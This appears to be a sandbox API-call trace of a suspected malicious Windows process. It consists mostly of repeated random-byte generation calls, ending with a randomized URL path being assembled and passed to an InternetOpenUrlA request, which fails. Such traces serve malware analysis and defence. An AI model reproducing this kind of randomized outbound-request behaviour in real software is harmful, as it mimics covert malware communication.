[0238.344] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.344] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.344] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.344] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.344] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.344] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.344] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.344] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.344] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.345] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.345] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.345] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.345] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.345] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.345] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.345] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.345] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.346] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.346] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.346] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.346] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.346] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.346] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.346] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.346] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.346] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.346] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.346] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.347] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.347] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0238.347] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.347] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0238.347] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.347] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.347] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.347] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0238.347] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.347] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0238.347] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.347] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.348] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.348] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0238.348] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.348] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.348] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.348] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.348] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.348] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.348] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.348] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0238.348] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.348] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0238.349] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.349] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d4fd0, cbBuffer=0x2a, dwFlags=0x2 | out: pbBuffer=0x4d4fd0) returned 0x0 [0238.349] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.349] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.349] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.349] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0238.349] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.349] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.349] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.349] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.349] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.350] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0238.350] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.350] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.350] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.350] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.350] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.350] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.350] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.350] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.350] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.350] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0238.351] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.351] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.351] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.351] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.351] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.351] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.351] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.351] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0238.351] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.351] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.351] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.351] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.351] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.351] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.352] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.352] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.352] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.352] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.352] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.352] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.352] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.352] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.352] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.352] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.352] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.352] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.353] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.353] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0238.353] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.353] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.353] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.353] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.353] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.353] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0238.353] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.354] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.354] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.354] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.354] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.354] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0238.354] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.354] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d4ffa, cbBuffer=0x29, dwFlags=0x2 | out: pbBuffer=0x4d4ffa) returned 0x0 [0238.354] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.354] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.355] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.355] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0238.355] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.355] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.355] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.355] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.355] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.355] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.356] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.356] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.356] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.356] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.356] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.356] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.356] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.356] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0238.356] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.357] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0238.357] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.357] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.357] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.620] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.620] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.620] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.620] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.620] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.620] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.620] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.620] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.620] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0238.620] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.620] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.621] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.621] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.621] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.621] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0238.621] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.621] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0238.621] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.621] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.622] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.622] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.622] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.622] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0238.622] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.622] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.623] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.623] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0238.623] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.623] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.623] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.623] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.623] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.623] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.623] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.623] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.623] GetProcessHeap () returned 0x440000 [0238.623] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472f30 [0238.623] lstrcpyA (in: lpString1=0x472f30, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0238.624] lstrcatA (in: lpString1="\x04", lpString2="/by9lKe3Xk7omyhuim2nlTog1x2qesIvecGym/cBux1udtwrrJpcjleqlpqctatl65l88BQrbg2vyr9/cnU40me6pvBSlm2dlj8tYozoULEsacuxl9wqmAEbt/v9muu5chaDBs04tXcwltno3ybAi92tyVv60cwMam/" | out: lpString1="\x04/by9lKe3Xk7omyhuim2nlTog1x2qesIvecGym/cBux1udtwrrJpcjleqlpqctatl65l88BQrbg2vyr9/cnU40me6pvBSlm2dlj8tYozoULEsacuxl9wqmAEbt/v9muu5chaDBs04tXcwltno3ybAi92tyVv60cwMam/") returned="\x04/by9lKe3Xk7omyhuim2nlTog1x2qesIvecGym/cBux1udtwrrJpcjleqlpqctatl65l88BQrbg2vyr9/cnU40me6pvBSlm2dlj8tYozoULEsacuxl9wqmAEbt/v9muu5chaDBs04tXcwltno3ybAi92tyVv60cwMam/" [0238.624] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0238.624] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/by9lKe3Xk7omyhuim2nlTog1x2qesIvecGym/cBux1udtwrrJpcjleqlpqctatl65l88BQrbg2vyr9/cnU40me6pvBSlm2dlj8tYozoULEsacuxl9wqmAEbt/v9muu5chaDBs04tXcwltno3ybAi92tyVv60cwMam/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0238.624] GetProcessHeap () returned 0x440000 [0238.624] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472f30 | out: hHeap=0x440000) returned 1 [0238.624] GetProcessHeap () returned 0x440000 [0238.624] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4d4f80 | out: hHeap=0x440000) returned 1 [0238.624] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0238.625] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0238.625] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.625] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 